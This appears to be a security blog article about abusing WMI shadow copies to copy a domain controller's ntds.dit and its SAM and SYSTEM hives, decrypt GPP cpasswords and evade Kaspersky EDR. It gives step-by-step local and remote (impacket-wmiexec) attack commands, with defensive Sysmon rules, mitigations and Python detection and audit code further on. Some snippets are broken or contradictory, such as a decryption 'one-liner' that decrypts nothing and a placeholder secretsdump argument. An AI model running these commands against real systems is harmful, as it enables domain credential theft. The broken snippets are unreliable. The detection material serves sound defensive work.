Silent Raid: How Abusing WMI Shadow Copies Silently Bypasses Kaspersky EDR and Dumps AD Credentials + Video

Introduction:

Traditional credential dumping techniques like LSASS memory extraction, DCSync, and registry hive harvesting are noisy and easily flagged by modern EDR solutions. By leveraging Windows Management Instrumentation (WMI) to create a shadow copy of the entire system volume, attackers can silently access sensitive files—including the NTDS.dit database, SYSVOL policies, and registry hives—without triggering common EDR hooks.

Learning Objectives:

  • Understand how WMI-based shadow copy creation enables stealthy volume access and bypasses EDR monitoring.
  • Learn step-by-step commands to create, mount, and extract credentials from shadow copies using native Windows tools.
  • Implement detection rules and hardening measures to defend against shadow copy abuse in Active Directory environments.

You Should Know:

  1. The WMI Shadow Copy Technique: A Quiet Alternative to LSASS

Instead of targeting LSASS.exe (which EDRs heavily instrument), this method abuses WMI to create a read‑only point‑in‑time snapshot of the `C:` volume. The shadow copy can then be accessed as a regular drive letter, allowing direct file reads without touching live process memory.

Step‑by‑step guide (attacker perspective, Windows 10/Server 2016+):

1. Create a shadow copy using WMIC:

wmic shadowcopy call create Volume=C:\

Record the returned `ShadowID` or the device path (e.g., \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1).

2. Verify the shadow copy exists:

vssadmin list shadows

Or with PowerShell:

Get-WmiObject -Class Win32_ShadowCopy | Select-Object VolumeName, InstallDate, DeviceObject

3. Access sensitive files directly from the shadow copy:

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.dit
    reg save HKLM\SYSTEM C:\temp\SYSTEM
    reg save HKLM\SAM C:\temp\SAM

The NTDS.dit file is locked on the live system, but the shadow copy bypasses this lock.

4. Extract credentials offline:

    # Using impacket-secretsdump on Linux
    impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes LM:NTLM LOCAL

Why it evades EDR: Most EDRs monitor `lsass.exe` memory access, `MiniDumpWriteDump` API calls, and known credential dumping tools. Direct file reads from a shadow copy appear as normal backup operations and are rarely flagged unless custom rules exist.

  2. Extracting Credentials from SYSVOL and Group Policy Preferences

Beyond the NTDS.dit file, shadow copies grant access to `SYSVOL` – the domain‑wide share containing Group Policy Objects (GPOs). Older policies often embed `cpassword` fields for local admin accounts, which use a known static AES key.

Step‑by‑step extraction guide:

  1. Mount the shadow copy as a drive letter (requires admin privileges):

    mklink /D C:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\

Or use `vshadow.exe` from the Windows SDK.

2. Locate Groups.xml files inside SYSVOL:

    dir /s C:\shadowcopy\Windows\SYSVOL\domain\Policies\Groups.xml

3. Find the `cpassword` field:

<Properties ... cpassword="t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6" ... />

4. Decrypt using `gpp-decrypt` (Kali Linux) or PowerShell:

    # PowerShell one-liner (static key)
    $cpassword = "t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6"

On Linux:

    gpp-decrypt t7WzJkUq3l5zX9mNpR2vB8cFdG4hJkL6

Note: Modern Windows versions (2016+) no longer store cpassword by default, but many legacy GPOs remain vulnerable. The real value lies in accessing SYSVOL for scripts, scheduled tasks, and other misconfigurations.

  3. Bypassing EDR: Why Shadow Copies Evade Traditional Hooks

Kaspersky EDR and similar products typically hook processes like lsass.exe, wmiPrvSE.exe, and common tools (mimikatz, procdump). The WMI shadow copy technique operates at the filesystem driver level – the shadow copy device is a volume, not a process. When you copy `ntds.dit` from the shadow path, the read operations go through `ntfs.sys` and volsnap.sys, which are legitimate system drivers rarely monitored for anomalous reads.

To simulate the evasion in a lab:

  1. Deploy a Windows Server 2019 with Kaspersky EDR (trial mode).
  2. Run the WMIC shadow copy command – EDR logs a generic WMI event but no alert.
  3. Copy `ntds.dit` via the shadow path – no LSASS access, no alert.
  4. Only post‑exploitation (e.g., `secretsdump` network traffic) might trigger, but the dump itself is already exfiltrated.

What EDR would normally see:

– `mimikatz.exe` → `sekurlsa::logonpasswords` → alert.
– `procdump.exe -ma lsass.exe` → alert.

What remains invisible: `wmic shadowcopy call create` followed by `copy` commands – often logged but not correlated into a high‑severity alert.

  4. Linux Alternative: Using Impacket and Remote WMI

Attackers often operate from a Kali Linux machine. Impacket’s `wmiexec.py` can remotely create shadow copies and retrieve files without ever touching the target’s disk interactively.

Step‑by‑step remote attack using Impacket:

1. Install impacket:

    pip3 install impacket

2. Create a shadow copy remotely (requires admin credentials):

    impacket-wmiexec domain/user:password@target_ip 'wmic shadowcopy call create Volume=C:\'

Capture the output to find the `ShadowCopyID` or device path.

3. List the shadow copy:

    impacket-wmiexec domain/user:password@target_ip 'vssadmin list shadows'

4. Copy ntds.dit from the shadow copy to a network share or local temp:

    impacket-wmiexec domain/user:password@target_ip 'copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit \\target_ip\C$\temp\ntds.dit'

5. Download the file: Use `impacket-smbclient` or `smbclient` to pull the dump.

Why this is dangerous: The entire attack chain uses only WMI and SMB – both legitimate administrative protocols. No custom malware, no LSASS interaction.

  5. Detection and Hardening: Monitoring for Suspicious WMI and Shadow Copy Activities

Defenders must shift focus from process‑based detection to filesystem and WMI telemetry.

Key Windows Event IDs to monitor:

| Event ID | Source | Description |
|---|---|---|
| 5857 | WMI-Activity | WMI method call (e.g., `Create` on Win32_ShadowCopy) |
| 4688 | Security | Process creation – look for `wmic.exe` or `vssadmin.exe` with `shadowcopy` |
| 5145 | Security | Detailed file share access – detect reads of `ntds.dit` from unexpected paths |
| 1 | Sysmon | Process creation – additionally filter command lines containing `shadowcopy` |

Sysmon configuration snippet to alert on shadow copy creation:

    <Sysmon schemaversion="4.50">
      <EventFiltering>
        <!-- Event ID 1: process creation whose command line asks for a shadow copy.
             Entries inside an include block are ORed, so either string is enough to match. -->
        <RuleGroup name="ShadowCopyCreate" groupRelation="or">
          <ProcessCreate onmatch="include">
            <!-- wmic shadowcopy call create, or Win32_ShadowCopy called from PowerShell -->
            <CommandLine condition="contains">shadowcopy</CommandLine>
            <!-- vssadmin create shadow /for=C: -->
            <CommandLine condition="contains">create shadow</CommandLine>
          </ProcessCreate>
        </RuleGroup>
      </EventFiltering>
    </Sysmon>

Mitigation steps for system administrators:

1. Restrict who can create shadow copies:

  • Shadow copies require the SeBackupPrivilege. Remove this privilege from all non‑backup accounts via `secedit` or GPO.
  • Use the `Backup Operators` group sparingly.

2. Disable WMIC entirely if not needed:

    REM Uninstall the WMI command-line tool (Windows 10/11)
    dism /online /disable-feature /featurename:WMIC

Or block `wmic.exe` via AppLocker / WDAC.

3. Enable VSS event logging (default is verbose):

    wevtutil set-log "Microsoft-Windows-VSS/Operational" /e:true /rt:false /ms:1073741824

4. Deploy EDR rules for anomalous file reads:

  • Alert when a process reads `ntds.dit` and the process is not ntbackup.exe, vssvc.exe, or a backup agent.
  • Alert when `wmic.exe` calls `Win32_ShadowCopy` followed by a file copy operation.
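
As an added example (not code from the original post), the two rules above expressed as a correlation check in Python: it walks a stream of normalised events, remembers shadow-copy creations per host, and raises a high-severity alert when a non-backup process reads `ntds.dit` within a window of one, and a medium alert when such a read has no preceding snapshot. The event field names, the backup allow-list and the sample events are assumptions; 4663 is the Security log's object-access event for local file reads.

```python
# Correlate shadow-copy creation with later ntds.dit reads by non-backup processes.
# Sample events are constructed, not real telemetry; the field names are an
# assumption about how a SIEM normalises 4688 / 5857 / 4663 records.
from datetime import datetime, timedelta

# Assumption: processes allowed to touch ntds.dit; extend with your backup agent.
BACKUP_PROCESSES = {"ntbackup.exe", "vssvc.exe", "wbengine.exe"}
WINDOW = timedelta(minutes=30)  # how long after a snapshot a read counts as correlated

SAMPLE_EVENTS = [  # constructed sample input
    {"time": "2024-05-01T10:00:00", "host": "DC01", "id": 4688, "user": "CORP\\jdoe",
     "process": "wmic.exe", "detail": "wmic shadowcopy call create Volume=C:\\"},
    {"time": "2024-05-01T10:00:02", "host": "DC01", "id": 5857, "user": "CORP\\jdoe",
     "process": "wmiprvse.exe", "detail": "Win32_ShadowCopy::Create"},
    {"time": "2024-05-01T10:03:10", "host": "DC01", "id": 4663, "user": "CORP\\jdoe",
     "process": "cmd.exe", "detail": r"\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit"},
    {"time": "2024-05-01T22:05:00", "host": "DC02", "id": 4663, "user": "NT AUTHORITY\\SYSTEM",
     "process": "wbengine.exe", "detail": r"C:\Windows\NTDS\ntds.dit"},  # legitimate backup
    {"time": "2024-05-02T08:15:00", "host": "DC02", "id": 4663, "user": "CORP\\svc-legacy",
     "process": "robocopy.exe", "detail": r"C:\Windows\NTDS\ntds.dit"},  # no snapshot first
]

def is_shadow_copy_creation(ev):
    """4688 with 'shadowcopy ... create' or the 5857 method call on Win32_ShadowCopy."""
    d = ev["detail"].lower()
    return "shadowcopy" in d and "create" in d

def is_sensitive_read(ev):
    """Any ntds.dit access by a process outside the backup allow-list."""
    return "ntds.dit" in ev["detail"].lower() and ev["process"].lower() not in BACKUP_PROCESSES

def detect(events, window=WINDOW):
    """One alert per suspicious read; severity is high when a snapshot preceded it on that host."""
    snapshots, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO-8601 strings sort chronologically
        t = datetime.fromisoformat(ev["time"])
        if is_shadow_copy_creation(ev):
            snapshots.setdefault(ev["host"], []).append(t)
        elif is_sensitive_read(ev):
            recent = [s for s in snapshots.get(ev["host"], []) if timedelta(0) <= t - s <= window]
            alerts.append({
                "host": ev["host"], "user": ev["user"], "process": ev["process"],
                "severity": "high" if recent else "medium",
                "seconds_after_snapshot": int((t - recent[-1]).total_seconds()) if recent else None,
            })
    return alerts
```

Run `detect(SAMPLE_EVENTS)` to see one high alert for DC01 (the copy 188 s after the snapshot) and one medium alert for the robocopy read on DC02; the backup engine's read produces nothing.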

  6. Cloud and AD Hardening: Protecting SYSVOL and GPOs

Shadow copy abuse is most effective when SYSVOL contains readable credentials. Harden your Active Directory environment:

  • Remove all Group Policy Preferences that store passwords: Use `Get-GPPPassword` (PowerShell) to audit and replace with LAPS or managed service accounts.
  • Enable SYSVOL encryption: Since Windows Server 2016, `SYSVOL` can be replicated with DFS‑R and encrypted via SMB encryption.
    Set-SmbShare -Name SYSVOL -EncryptData $true
    
  • Deploy Local Administrator Password Solution (LAPS): LAPS randomizes local admin passwords and stores them in a protected AD attribute, not in GPO cpassword fields.
  • Monitor for unusual access to `\\domain\SYSVOL\` – especially from non‑domain controllers.

Audit command (run on DC):

    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=5145} | Where-Object { $_.Message -like "*SYSVOL*" -and $_.Message -like "*Groups.xml*" }
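
The audit in the first bullet above ("Remove all Group Policy Preferences that store passwords"), as an added Python example that is neither `Get-GPPPassword` nor code from the original post: it parses Group Policy Preference XML files for any element carrying a `cpassword` attribute and reports the file, the account it belongs to and the policy's last-changed date, so each entry can be removed and replaced with LAPS. The `Groups.xml` sample is constructed, with a placeholder in place of a real `cpassword` value; the set of GPP file names and account-naming attributes is an assumption.

```python
# Audit SYSVOL Group Policy Preference files for cpassword attributes.
# Added example; the sample XML is constructed and its cpassword is a placeholder.
import os
import xml.etree.ElementTree as ET

# Assumption: GPP file types that may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "ScheduledTasks.xml", "Services.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Assumption: attributes that name the account the secret belongs to, by file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" changed="2015-02-10 09:00:00">
    <Properties action="U" cpassword="CONSTRUCTED_PLACEHOLDER_VALUE" userName="LocalAdmin"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <Group name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)" removeAccounts="0"/>
  </Group>
</Groups>"""

def find_cpassword_entries(xml_text, source="<string>"):
    """Return one finding per element that carries a cpassword attribute (even an empty one)."""
    findings = []
    root = ET.fromstring(xml_text)
    for parent in root.iter():          # track the parent: it holds the item name and change date
        for elem in parent:
            if "cpassword" not in elem.attrib:
                continue
            account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
            findings.append({"file": source, "element": parent.tag,
                             "item": parent.attrib.get("name"), "account": account,
                             "changed": parent.attrib.get("changed"),
                             "empty": elem.attrib["cpassword"] == ""})
    return findings

def scan_sysvol(sysvol_root):
    """Walk a SYSVOL tree (a local DC path or a mounted share) and collect findings."""
    findings = []
    for dirpath, _, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8-sig") as fh:  # GPP files are UTF-8 with a BOM
                try:
                    findings.extend(find_cpassword_entries(fh.read(), path))
                except ET.ParseError as exc:  # report unreadable policy files instead of skipping
                    findings.append({"file": path, "element": None, "account": None, "error": str(exc)})
    return findings
```

Point `scan_sysvol` at the DC's SYSVOL directory; every finding with a non-empty `cpassword` is a GPO that still ships a recoverable password.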

  7. Hands-On Lab: Simulating the Attack in a Safe Environment

To fully understand the technique, set up a controlled lab:

Requirements:

  • Windows Server 2022 (Domain Controller)
  • Windows 10/11 workstation (joined to domain)
  • Kali Linux (optional for remote attacks)

Lab steps:

  1. On the DC: Create a test domain user and add to `Domain Admins` (for simulation).
  2. On the workstation (or DC): Run the WMIC shadow copy command.
  3. Extract SYSTEM and SAM from the shadow copy:

    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\

  4. Crack NTLM hashes offline using `john` or hashcat:

    samdump2 SYSTEM SAM > hashes.txt
    john --format=nt hashes.txt

  5. Observe EDR behavior: If you have a trial EDR (e.g., Kaspersky, SentinelOne), note the lack of high‑severity alerts. Only informational logs about WMI activity.

Detection lab: On the same DC, enable Sysmon and custom rules. Repeat the attack and verify that events 5857 and 4688 are captured. Then implement the mitigation (remove `SeBackupPrivilege` from non‑backup accounts) and test again – the attack should fail with “Access denied”.

What Undercode Say:

  • Stealth over noise: Abusing WMI shadow copies proves that the quietest attacks often bypass EDRs by staying within legitimate administrative tools and filesystem drivers.
  • Detection shift required: Defenders must monitor not only process memory but also file read patterns from shadow copy volumes and unusual WMI method calls.
  • No technique is permanent: EDR vendors will eventually add heuristics for shadow copy creation followed by sensitive file reads – but for now, this remains a powerful red team vector.

Prediction:

Within the next 12–18 months, major EDR platforms (including Kaspersky, CrowdStrike, and Microsoft Defender for Endpoint) will introduce specific detections for shadow copy‑based credential access. These will likely involve kernel‑call stack analysis to differentiate backup software from malicious actors, and new event IDs for `ntds.dit` reads from non‑backup processes. However, attackers will adapt by chaining shadow copies with reflective DLL injection or by manipulating VSS writers to impersonate legitimate backup applications. The cat‑and‑mouse game continues, emphasizing the need for layered defense and privilege minimization.

Reported By: Mohammad Mashagba – Hackers Feeds